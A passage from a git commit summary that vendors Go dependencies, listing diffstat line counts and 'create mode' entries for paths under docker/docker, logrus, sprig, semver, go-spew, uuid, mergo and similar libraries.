78 + .../docker/docker/pkg/system/stat.go | 53 + .../docker/docker/pkg/system/stat_darwin.go | 32 + .../docker/docker/pkg/system/stat_freebsd.go | 27 + .../docker/docker/pkg/system/stat_linux.go | 33 + .../docker/docker/pkg/system/stat_openbsd.go | 15 + .../docker/docker/pkg/system/stat_solaris.go | 34 + .../docker/pkg/system/stat_unix_test.go | 39 + .../docker/pkg/system/stat_unsupported.go | 17 + .../docker/docker/pkg/system/stat_windows.go | 43 + .../docker/docker/pkg/system/syscall_unix.go | 17 + .../docker/pkg/system/syscall_windows.go | 105 + .../docker/pkg/system/syscall_windows_test.go | 9 + 
.../docker/docker/pkg/system/umask.go | 13 + .../docker/docker/pkg/system/umask_windows.go | 9 + .../docker/pkg/system/utimes_freebsd.go | 22 + .../docker/docker/pkg/system/utimes_linux.go | 26 + .../docker/pkg/system/utimes_unix_test.go | 68 + .../docker/pkg/system/utimes_unsupported.go | 10 + .../docker/docker/pkg/system/xattrs_linux.go | 63 + .../docker/pkg/system/xattrs_unsupported.go | 13 + .../docker/docker/pkg/tailfile/tailfile.go | 66 + .../docker/pkg/tailfile/tailfile_test.go | 148 + .../docker/pkg/tarsum/builder_context.go | 21 + .../docker/pkg/tarsum/builder_context_test.go | 67 + .../docker/docker/pkg/tarsum/fileinfosums.go | 126 + .../docker/pkg/tarsum/fileinfosums_test.go | 62 + .../docker/docker/pkg/tarsum/tarsum.go | 295 + .../docker/docker/pkg/tarsum/tarsum_spec.md | 230 + .../docker/docker/pkg/tarsum/tarsum_test.go | 664 ++ .../json | 1 + .../layer.tar | Bin 0 -> 9216 bytes .../json | 1 + .../layer.tar | Bin 0 -> 1536 bytes .../tarsum/testdata/collision/collision-0.tar | Bin 0 -> 10240 bytes .../tarsum/testdata/collision/collision-1.tar | Bin 0 -> 10240 bytes .../tarsum/testdata/collision/collision-2.tar | Bin 0 -> 10240 bytes .../tarsum/testdata/collision/collision-3.tar | Bin 0 -> 10240 bytes .../docker/pkg/tarsum/testdata/xattr/json | 1 + .../pkg/tarsum/testdata/xattr/layer.tar | Bin 0 -> 2560 bytes .../docker/docker/pkg/tarsum/versioning.go | 150 + .../docker/pkg/tarsum/versioning_test.go | 98 + .../docker/docker/pkg/tarsum/writercloser.go | 22 + .../docker/docker/pkg/term/ascii.go | 66 + .../docker/docker/pkg/term/ascii_test.go | 43 + .../docker/docker/pkg/term/tc_linux_cgo.go | 50 + .../docker/docker/pkg/term/tc_other.go | 20 + .../docker/docker/pkg/term/tc_solaris_cgo.go | 63 + .../github.com/docker/docker/pkg/term/term.go | 123 + .../docker/docker/pkg/term/term_solaris.go | 41 + .../docker/docker/pkg/term/term_unix.go | 29 + .../docker/docker/pkg/term/term_windows.go | 233 + .../docker/docker/pkg/term/termios_darwin.go | 69 + 
.../docker/docker/pkg/term/termios_freebsd.go | 69 + .../docker/docker/pkg/term/termios_linux.go | 47 + .../docker/docker/pkg/term/termios_openbsd.go | 69 + .../docker/pkg/term/windows/ansi_reader.go | 263 + .../docker/pkg/term/windows/ansi_writer.go | 64 + .../docker/docker/pkg/term/windows/console.go | 35 + .../docker/docker/pkg/term/windows/windows.go | 33 + .../docker/pkg/term/windows/windows_test.go | 3 + .../docker/pkg/testutil/assert/assert.go | 97 + .../docker/docker/pkg/testutil/pkg.go | 1 + .../docker/pkg/testutil/tempfile/tempfile.go | 36 + .../docker/pkg/tlsconfig/tlsconfig_clone.go | 11 + .../pkg/tlsconfig/tlsconfig_clone_go16.go | 31 + .../pkg/tlsconfig/tlsconfig_clone_go17.go | 33 + .../docker/pkg/truncindex/truncindex.go | 137 + .../docker/pkg/truncindex/truncindex_test.go | 429 + .../docker/docker/pkg/urlutil/urlutil.go | 50 + .../docker/docker/pkg/urlutil/urlutil_test.go | 70 + .../docker/docker/pkg/useragent/README.md | 1 + .../docker/docker/pkg/useragent/useragent.go | 55 + .../docker/pkg/useragent/useragent_test.go | 31 + .../docker/docker/plugin/backend_linux.go | 790 ++ .../docker/plugin/backend_unsupported.go | 71 + .../docker/docker/plugin/blobstore.go | 181 + .../github.com/docker/docker/plugin/defs.go | 26 + .../docker/docker/plugin/manager.go | 347 + .../docker/docker/plugin/manager_linux.go | 284 + .../docker/docker/plugin/manager_solaris.go | 28 + .../docker/docker/plugin/manager_windows.go | 30 + .../github.com/docker/docker/plugin/store.go | 263 + .../docker/docker/plugin/store_test.go | 33 + .../docker/docker/plugin/v2/plugin.go | 244 + .../docker/docker/plugin/v2/plugin_linux.go | 121 + .../docker/plugin/v2/plugin_unsupported.go | 14 + .../docker/docker/plugin/v2/settable.go | 102 + .../docker/docker/plugin/v2/settable_test.go | 91 + vendor/github.com/docker/docker/poule.yml | 88 + .../docker/profiles/apparmor/apparmor.go | 122 + .../docker/profiles/apparmor/template.go | 46 + .../docker/profiles/seccomp/default.json | 698 ++ 
.../profiles/seccomp/fixtures/example.json | 27 + .../docker/profiles/seccomp/generate.go | 32 + .../docker/docker/profiles/seccomp/seccomp.go | 150 + .../profiles/seccomp/seccomp_default.go | 604 ++ .../docker/profiles/seccomp/seccomp_test.go | 32 + .../profiles/seccomp/seccomp_unsupported.go | 13 + .../github.com/docker/docker/project/ARM.md | 45 + .../docker/project/BRANCHES-AND-TAGS.md | 35 + .../docker/docker/project/CONTRIBUTORS.md | 1 + .../docker/docker/project/GOVERNANCE.md | 17 + .../docker/project/IRC-ADMINISTRATION.md | 37 + .../docker/docker/project/ISSUE-TRIAGE.md | 132 + .../project/PACKAGE-REPO-MAINTENANCE.md | 74 + .../docker/docker/project/PACKAGERS.md | 307 + .../docker/docker/project/PATCH-RELEASES.md | 68 + .../docker/docker/project/PRINCIPLES.md | 19 + .../docker/docker/project/README.md | 24 + .../docker/project/RELEASE-CHECKLIST.md | 518 ++ .../docker/docker/project/RELEASE-PROCESS.md | 78 + .../docker/docker/project/REVIEWING.md | 246 + .../github.com/docker/docker/project/TOOLS.md | 63 + .../docker/docker/reference/reference.go | 216 + .../docker/docker/reference/reference_test.go | 275 + .../docker/docker/reference/store.go | 286 + .../docker/docker/reference/store_test.go | 356 + .../github.com/docker/docker/registry/auth.go | 303 + .../docker/docker/registry/auth_test.go | 124 + .../docker/docker/registry/config.go | 305 + .../docker/docker/registry/config_test.go | 49 + .../docker/docker/registry/config_unix.go | 25 + .../docker/docker/registry/config_windows.go | 25 + .../docker/docker/registry/endpoint_test.go | 78 + .../docker/docker/registry/endpoint_v1.go | 198 + .../docker/docker/registry/registry.go | 191 + .../docker/registry/registry_mock_test.go | 478 + .../docker/docker/registry/registry_test.go | 875 ++ .../docker/docker/registry/service.go | 304 + .../docker/docker/registry/service_v1.go | 40 + .../docker/docker/registry/service_v1_test.go | 23 + .../docker/docker/registry/service_v2.go | 78 + 
.../docker/docker/registry/session.go | 783 ++ .../docker/docker/registry/types.go | 73 + .../docker/restartmanager/restartmanager.go | 128 + .../restartmanager/restartmanager_test.go | 34 + .../docker/docker/runconfig/compare.go | 61 + .../docker/docker/runconfig/compare_test.go | 126 + .../docker/docker/runconfig/config.go | 97 + .../docker/docker/runconfig/config_test.go | 139 + .../docker/docker/runconfig/config_unix.go | 59 + .../docker/docker/runconfig/config_windows.go | 19 + .../docker/docker/runconfig/errors.go | 46 + .../fixtures/unix/container_config_1_14.json | 30 + .../fixtures/unix/container_config_1_17.json | 50 + .../fixtures/unix/container_config_1_19.json | 58 + .../unix/container_hostconfig_1_14.json | 18 + .../unix/container_hostconfig_1_19.json | 30 + .../windows/container_config_1_19.json | 58 + .../docker/docker/runconfig/hostconfig.go | 35 + .../docker/runconfig/hostconfig_solaris.go | 41 + .../docker/runconfig/hostconfig_test.go | 283 + .../docker/runconfig/hostconfig_unix.go | 129 + .../docker/runconfig/hostconfig_windows.go | 68 + .../docker/docker/runconfig/opts/envfile.go | 81 + .../docker/runconfig/opts/envfile_test.go | 142 + .../docker/runconfig/opts/fixtures/utf16.env | Bin 0 -> 54 bytes .../runconfig/opts/fixtures/utf16be.env | Bin 0 -> 54 bytes .../docker/runconfig/opts/fixtures/utf8.env | 3 + .../docker/runconfig/opts/fixtures/valid.env | 1 + .../runconfig/opts/fixtures/valid.label | 1 + .../docker/docker/runconfig/opts/opts.go | 83 + .../docker/docker/runconfig/opts/opts_test.go | 113 + .../docker/docker/runconfig/opts/parse.go | 995 +++ .../docker/runconfig/opts/parse_test.go | 894 ++ .../docker/docker/runconfig/opts/runtime.go | 79 + .../docker/runconfig/opts/throttledevice.go | 111 + .../docker/docker/runconfig/opts/ulimit.go | 57 + .../docker/runconfig/opts/ulimit_test.go | 42 + .../docker/runconfig/opts/weightdevice.go | 89 + .../github.com/docker/docker/utils/debug.go | 26 + .../docker/docker/utils/debug_test.go | 43 + 
.../github.com/docker/docker/utils/names.go | 9 + .../docker/docker/utils/process_unix.go | 22 + .../docker/docker/utils/process_windows.go | 20 + .../docker/utils/templates/templates.go | 42 + .../docker/utils/templates/templates_test.go | 38 + .../github.com/docker/docker/utils/utils.go | 87 + .../docker/docker/utils/utils_test.go | 21 + vendor/github.com/docker/docker/vendor.conf | 140 + .../docker/docker/volume/drivers/adapter.go | 177 + .../docker/docker/volume/drivers/extpoint.go | 215 + .../docker/volume/drivers/extpoint_test.go | 23 + .../docker/docker/volume/drivers/proxy.go | 242 + .../docker/volume/drivers/proxy_test.go | 132 + .../docker/docker/volume/local/local.go | 364 + .../docker/docker/volume/local/local_test.go | 344 + .../docker/docker/volume/local/local_unix.go | 87 + .../docker/volume/local/local_windows.go | 34 + .../docker/docker/volume/store/db.go | 88 + .../docker/docker/volume/store/errors.go | 76 + .../docker/docker/volume/store/restore.go | 83 + .../docker/docker/volume/store/store.go | 649 ++ .../docker/docker/volume/store/store_test.go | 234 + .../docker/docker/volume/store/store_unix.go | 9 + .../docker/volume/store/store_windows.go | 12 + .../docker/volume/testutils/testutils.go | 116 + .../docker/docker/volume/validate.go | 125 + .../docker/docker/volume/validate_test.go | 43 + .../docker/volume/validate_test_unix.go | 8 + .../docker/volume/validate_test_windows.go | 6 + .../github.com/docker/docker/volume/volume.go | 323 + .../docker/docker/volume/volume_copy.go | 23 + .../docker/docker/volume/volume_copy_unix.go | 8 + .../docker/volume/volume_copy_windows.go | 6 + .../docker/docker/volume/volume_linux.go | 56 + .../docker/docker/volume/volume_linux_test.go | 51 + .../docker/volume/volume_propagation_linux.go | 47 + .../volume/volume_propagation_linux_test.go | 65 + .../volume/volume_propagation_unsupported.go | 24 + .../docker/docker/volume/volume_test.go | 269 + .../docker/docker/volume/volume_unix.go | 138 + 
.../docker/volume/volume_unsupported.go | 16 + .../docker/docker/volume/volume_windows.go | 201 + .../go-ozzo/ozzo-validation/.gitignore | 24 + .../go-ozzo/ozzo-validation/.travis.yml | 16 + .../go-ozzo/ozzo-validation/LICENSE | 17 + .../go-ozzo/ozzo-validation/README.md | 530 ++ .../go-ozzo/ozzo-validation/UPGRADE.md | 46 + .../go-ozzo/ozzo-validation/date.go | 84 + .../go-ozzo/ozzo-validation/date_test.go | 69 + .../go-ozzo/ozzo-validation/error.go | 89 + .../go-ozzo/ozzo-validation/error_test.go | 70 + .../go-ozzo/ozzo-validation/example_test.go | 130 + .../github.com/go-ozzo/ozzo-validation/in.go | 43 + .../go-ozzo/ozzo-validation/in_test.go | 44 + .../go-ozzo/ozzo-validation/is/rules.go | 138 + .../go-ozzo/ozzo-validation/is/rules_test.go | 94 + .../go-ozzo/ozzo-validation/length.go | 77 + .../go-ozzo/ozzo-validation/length_test.go | 90 + .../go-ozzo/ozzo-validation/match.go | 47 + .../go-ozzo/ozzo-validation/match_test.go | 44 + .../go-ozzo/ozzo-validation/minmax.go | 177 + .../go-ozzo/ozzo-validation/minmax_test.go | 137 + .../go-ozzo/ozzo-validation/not_nil.go | 32 + .../go-ozzo/ozzo-validation/not_nil_test.go | 50 + .../go-ozzo/ozzo-validation/required.go | 42 + .../go-ozzo/ozzo-validation/required_test.go | 75 + .../go-ozzo/ozzo-validation/string.go | 48 + .../go-ozzo/ozzo-validation/string_test.go | 106 + .../go-ozzo/ozzo-validation/struct.go | 154 + .../go-ozzo/ozzo-validation/struct_test.go | 137 + .../go-ozzo/ozzo-validation/util.go | 157 + .../go-ozzo/ozzo-validation/util_test.go | 293 + .../go-ozzo/ozzo-validation/validation.go | 133 + .../ozzo-validation/validation_test.go | 145 + vendor/github.com/google/uuid/.travis.yml | 9 + vendor/github.com/google/uuid/CONTRIBUTING.md | 10 + vendor/github.com/google/uuid/CONTRIBUTORS | 9 + vendor/github.com/google/uuid/LICENSE | 27 + vendor/github.com/google/uuid/README.md | 23 + vendor/github.com/google/uuid/dce.go | 80 + vendor/github.com/google/uuid/doc.go | 12 + vendor/github.com/google/uuid/hash.go | 53 + 
vendor/github.com/google/uuid/json_test.go | 62 + vendor/github.com/google/uuid/marshal.go | 39 + vendor/github.com/google/uuid/node.go | 103 + vendor/github.com/google/uuid/seq_test.go | 66 + vendor/github.com/google/uuid/sql.go | 58 + vendor/github.com/google/uuid/sql_test.go | 102 + vendor/github.com/google/uuid/time.go | 123 + vendor/github.com/google/uuid/util.go | 43 + vendor/github.com/google/uuid/uuid.go | 191 + vendor/github.com/google/uuid/uuid_test.go | 526 ++ vendor/github.com/google/uuid/version1.go | 44 + vendor/github.com/google/uuid/version4.go | 38 + vendor/github.com/huandu/xstrings/.gitignore | 24 + vendor/github.com/huandu/xstrings/.travis.yml | 1 + .../huandu/xstrings/CONTRIBUTING.md | 23 + vendor/github.com/huandu/xstrings/LICENSE | 22 + vendor/github.com/huandu/xstrings/README.md | 114 + vendor/github.com/huandu/xstrings/common.go | 25 + vendor/github.com/huandu/xstrings/convert.go | 364 + .../huandu/xstrings/convert_test.go | 165 + vendor/github.com/huandu/xstrings/count.go | 120 + .../github.com/huandu/xstrings/count_test.go | 62 + vendor/github.com/huandu/xstrings/doc.go | 8 + vendor/github.com/huandu/xstrings/format.go | 170 + .../github.com/huandu/xstrings/format_test.go | 100 + .../github.com/huandu/xstrings/manipulate.go | 217 + .../huandu/xstrings/manipulate_test.go | 142 + .../github.com/huandu/xstrings/translate.go | 547 ++ .../huandu/xstrings/translate_test.go | 96 + .../github.com/huandu/xstrings/util_test.go | 33 + vendor/github.com/imdario/mergo/.gitignore | 33 + vendor/github.com/imdario/mergo/.travis.yml | 7 + .../imdario/mergo/CODE_OF_CONDUCT.md | 46 + vendor/github.com/imdario/mergo/LICENSE | 28 + vendor/github.com/imdario/mergo/README.md | 222 + vendor/github.com/imdario/mergo/doc.go | 44 + .../github.com/imdario/mergo/issue17_test.go | 25 + .../github.com/imdario/mergo/issue23_test.go | 27 + .../github.com/imdario/mergo/issue33_test.go | 33 + .../github.com/imdario/mergo/issue38_test.go | 59 + 
.../github.com/imdario/mergo/issue50_test.go | 18 + .../github.com/imdario/mergo/issue52_test.go | 99 + .../github.com/imdario/mergo/issue61_test.go | 20 + .../github.com/imdario/mergo/issue64_test.go | 38 + .../github.com/imdario/mergo/issue66_test.go | 48 + vendor/github.com/imdario/mergo/map.go | 174 + vendor/github.com/imdario/mergo/merge.go | 245 + .../imdario/mergo/merge_appendslice_test.go | 33 + vendor/github.com/imdario/mergo/merge_test.go | 50 + vendor/github.com/imdario/mergo/mergo.go | 97 + vendor/github.com/imdario/mergo/mergo_test.go | 733 ++ vendor/github.com/imdario/mergo/pr80_test.go | 18 + vendor/github.com/imdario/mergo/pr81_test.go | 42 + .../imdario/mergo/testdata/license.yml | 4 + .../imdario/mergo/testdata/thing.yml | 6 + 2471 files changed, 356877 insertions(+), 2 deletions(-) create mode 100644 vendor/github.com/Masterminds/semver/.travis.yml create mode 100644 vendor/github.com/Masterminds/semver/CHANGELOG.md create mode 100644 vendor/github.com/Masterminds/semver/LICENSE.txt create mode 100644 vendor/github.com/Masterminds/semver/Makefile create mode 100644 vendor/github.com/Masterminds/semver/README.md create mode 100644 vendor/github.com/Masterminds/semver/appveyor.yml create mode 100644 vendor/github.com/Masterminds/semver/benchmark_test.go create mode 100644 vendor/github.com/Masterminds/semver/collection.go create mode 100644 vendor/github.com/Masterminds/semver/collection_test.go create mode 100644 vendor/github.com/Masterminds/semver/constraints.go create mode 100644 vendor/github.com/Masterminds/semver/constraints_test.go create mode 100644 vendor/github.com/Masterminds/semver/doc.go create mode 100644 vendor/github.com/Masterminds/semver/version.go create mode 100644 vendor/github.com/Masterminds/semver/version_test.go create mode 100644 vendor/github.com/Masterminds/sprig/.gitignore create mode 100644 vendor/github.com/Masterminds/sprig/.travis.yml create mode 100644 vendor/github.com/Masterminds/sprig/CHANGELOG.md create mode 
100644 vendor/github.com/Masterminds/sprig/LICENSE.txt create mode 100644 vendor/github.com/Masterminds/sprig/Makefile create mode 100644 vendor/github.com/Masterminds/sprig/README.md create mode 100644 vendor/github.com/Masterminds/sprig/appveyor.yml create mode 100644 vendor/github.com/Masterminds/sprig/crypto.go create mode 100644 vendor/github.com/Masterminds/sprig/crypto_test.go create mode 100644 vendor/github.com/Masterminds/sprig/date.go create mode 100644 vendor/github.com/Masterminds/sprig/date_test.go create mode 100644 vendor/github.com/Masterminds/sprig/defaults.go create mode 100644 vendor/github.com/Masterminds/sprig/defaults_test.go create mode 100644 vendor/github.com/Masterminds/sprig/dict.go create mode 100644 vendor/github.com/Masterminds/sprig/dict_test.go create mode 100644 vendor/github.com/Masterminds/sprig/doc.go create mode 100644 vendor/github.com/Masterminds/sprig/docs/_config.yml create mode 100644 vendor/github.com/Masterminds/sprig/docs/conversion.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/crypto.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/date.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/defaults.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/dicts.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/encoding.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/flow_control.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/index.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/integer_slice.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/lists.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/math.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/os.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/paths.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/reflection.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/semver.md create mode 
100644 vendor/github.com/Masterminds/sprig/docs/string_slice.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/strings.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/uuid.md create mode 100644 vendor/github.com/Masterminds/sprig/example_test.go create mode 100644 vendor/github.com/Masterminds/sprig/flow_control_test.go create mode 100644 vendor/github.com/Masterminds/sprig/functions.go create mode 100644 vendor/github.com/Masterminds/sprig/functions_test.go create mode 100644 vendor/github.com/Masterminds/sprig/glide.lock create mode 100644 vendor/github.com/Masterminds/sprig/glide.yaml create mode 100644 vendor/github.com/Masterminds/sprig/list.go create mode 100644 vendor/github.com/Masterminds/sprig/list_test.go create mode 100644 vendor/github.com/Masterminds/sprig/numeric.go create mode 100644 vendor/github.com/Masterminds/sprig/numeric_test.go create mode 100644 vendor/github.com/Masterminds/sprig/reflect.go create mode 100644 vendor/github.com/Masterminds/sprig/reflect_test.go create mode 100644 vendor/github.com/Masterminds/sprig/regex.go create mode 100644 vendor/github.com/Masterminds/sprig/regex_test.go create mode 100644 vendor/github.com/Masterminds/sprig/semver.go create mode 100644 vendor/github.com/Masterminds/sprig/semver_test.go create mode 100644 vendor/github.com/Masterminds/sprig/strings.go create mode 100644 vendor/github.com/Masterminds/sprig/strings_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/.gitignore create mode 100644 vendor/github.com/Sirupsen/logrus/.travis.yml create mode 100644 vendor/github.com/Sirupsen/logrus/CHANGELOG.md create mode 100644 vendor/github.com/Sirupsen/logrus/LICENSE create mode 100644 vendor/github.com/Sirupsen/logrus/README.md create mode 100644 vendor/github.com/Sirupsen/logrus/alt_exit.go create mode 100644 vendor/github.com/Sirupsen/logrus/alt_exit_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/appveyor.yml create mode 100644 
vendor/github.com/Sirupsen/logrus/doc.go create mode 100644 vendor/github.com/Sirupsen/logrus/entry.go create mode 100644 vendor/github.com/Sirupsen/logrus/entry_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/example_basic_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/example_hook_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/exported.go create mode 100644 vendor/github.com/Sirupsen/logrus/formatter.go create mode 100644 vendor/github.com/Sirupsen/logrus/formatter_bench_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/hook_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/hooks.go create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/test/test.go create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/json_formatter.go create mode 100644 vendor/github.com/Sirupsen/logrus/json_formatter_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/logger.go create mode 100644 vendor/github.com/Sirupsen/logrus/logger_bench_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/logrus.go create mode 100644 vendor/github.com/Sirupsen/logrus/logrus_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_bsd.go create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_linux.go create mode 100644 vendor/github.com/Sirupsen/logrus/text_formatter.go create mode 100644 vendor/github.com/Sirupsen/logrus/text_formatter_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/writer.go create mode 100644 
vendor/github.com/aokoli/goutils/.travis.yml create mode 100644 vendor/github.com/aokoli/goutils/CHANGELOG.md create mode 100644 vendor/github.com/aokoli/goutils/LICENSE.txt create mode 100644 vendor/github.com/aokoli/goutils/README.md create mode 100644 vendor/github.com/aokoli/goutils/appveyor.yml create mode 100644 vendor/github.com/aokoli/goutils/randomstringutils.go create mode 100644 vendor/github.com/aokoli/goutils/randomstringutils_test.go create mode 100644 vendor/github.com/aokoli/goutils/stringutils.go create mode 100644 vendor/github.com/aokoli/goutils/stringutils_test.go create mode 100644 vendor/github.com/aokoli/goutils/wordutils.go create mode 100644 vendor/github.com/aokoli/goutils/wordutils_test.go create mode 100644 vendor/github.com/davecgh/go-spew/.gitignore create mode 100644 vendor/github.com/davecgh/go-spew/.travis.yml create mode 100644 vendor/github.com/davecgh/go-spew/LICENSE create mode 100644 vendor/github.com/davecgh/go-spew/README.md create mode 100644 vendor/github.com/davecgh/go-spew/cov_report.sh create mode 100644 vendor/github.com/davecgh/go-spew/spew/bypass.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/bypasssafe.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/common.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/common_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/config.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/doc.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/dump.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/dump_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/example_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/format.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/format_test.go create mode 100644 
vendor/github.com/davecgh/go-spew/spew/internal_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/spew.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/spew_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go create mode 100644 vendor/github.com/davecgh/go-spew/test_coverage.txt create mode 100644 vendor/github.com/docker/docker/.dockerignore create mode 100644 vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md create mode 100644 vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md create mode 100644 vendor/github.com/docker/docker/.gitignore create mode 100644 vendor/github.com/docker/docker/.mailmap create mode 100644 vendor/github.com/docker/docker/AUTHORS create mode 100644 vendor/github.com/docker/docker/CHANGELOG.md create mode 100644 vendor/github.com/docker/docker/CONTRIBUTING.md create mode 100644 vendor/github.com/docker/docker/Dockerfile create mode 100644 vendor/github.com/docker/docker/Dockerfile.aarch64 create mode 100644 vendor/github.com/docker/docker/Dockerfile.armhf create mode 100644 vendor/github.com/docker/docker/Dockerfile.ppc64le create mode 100644 vendor/github.com/docker/docker/Dockerfile.s390x create mode 100644 vendor/github.com/docker/docker/Dockerfile.simple create mode 100644 vendor/github.com/docker/docker/Dockerfile.solaris create mode 100644 vendor/github.com/docker/docker/Dockerfile.windows create mode 100644 vendor/github.com/docker/docker/LICENSE create mode 100644 vendor/github.com/docker/docker/MAINTAINERS create mode 100644 vendor/github.com/docker/docker/Makefile create mode 100644 vendor/github.com/docker/docker/NOTICE create mode 100644 vendor/github.com/docker/docker/README.md create mode 100644 vendor/github.com/docker/docker/ROADMAP.md create mode 100644 vendor/github.com/docker/docker/VENDORING.md create mode 100644 vendor/github.com/docker/docker/VERSION 
create mode 100644 vendor/github.com/docker/docker/api/README.md create mode 100644 vendor/github.com/docker/docker/api/common.go create mode 100644 vendor/github.com/docker/docker/api/common_test.go create mode 100644 vendor/github.com/docker/docker/api/common_unix.go create mode 100644 vendor/github.com/docker/docker/api/common_windows.go create mode 100644 vendor/github.com/docker/docker/api/errors/errors.go create mode 100644 vendor/github.com/docker/docker/api/fixtures/keyfile create mode 100644 vendor/github.com/docker/docker/api/server/httputils/decoder.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/errors.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/form.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/form_test.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/cors.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/debug.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/experimental.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/middleware.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/version.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/version_test.go create mode 100644 vendor/github.com/docker/docker/api/server/profiler.go create mode 100644 vendor/github.com/docker/docker/api/server/router/build/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/build/build.go create mode 100644 
vendor/github.com/docker/docker/api/server/router/build/build_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go create mode 100644 vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/container.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/container_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/copy.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/exec.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/inspect.go create mode 100644 vendor/github.com/docker/docker/api/server/router/experimental.go create mode 100644 vendor/github.com/docker/docker/api/server/router/image/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/image/image.go create mode 100644 vendor/github.com/docker/docker/api/server/router/image/image_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/local.go create mode 100644 vendor/github.com/docker/docker/api/server/router/network/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/network/filter.go create mode 100644 vendor/github.com/docker/docker/api/server/router/network/network.go create mode 100644 vendor/github.com/docker/docker/api/server/router/network/network_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/plugin/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/plugin/plugin.go create mode 100644 vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go create mode 100644 
vendor/github.com/docker/docker/api/server/router/router.go create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/cluster.go create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/system/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/system/system.go create mode 100644 vendor/github.com/docker/docker/api/server/router/system/system_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/volume/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/volume/volume.go create mode 100644 vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router_swapper.go create mode 100644 vendor/github.com/docker/docker/api/server/server.go create mode 100644 vendor/github.com/docker/docker/api/server/server_test.go create mode 100644 vendor/github.com/docker/docker/api/swagger-gen.yaml create mode 100644 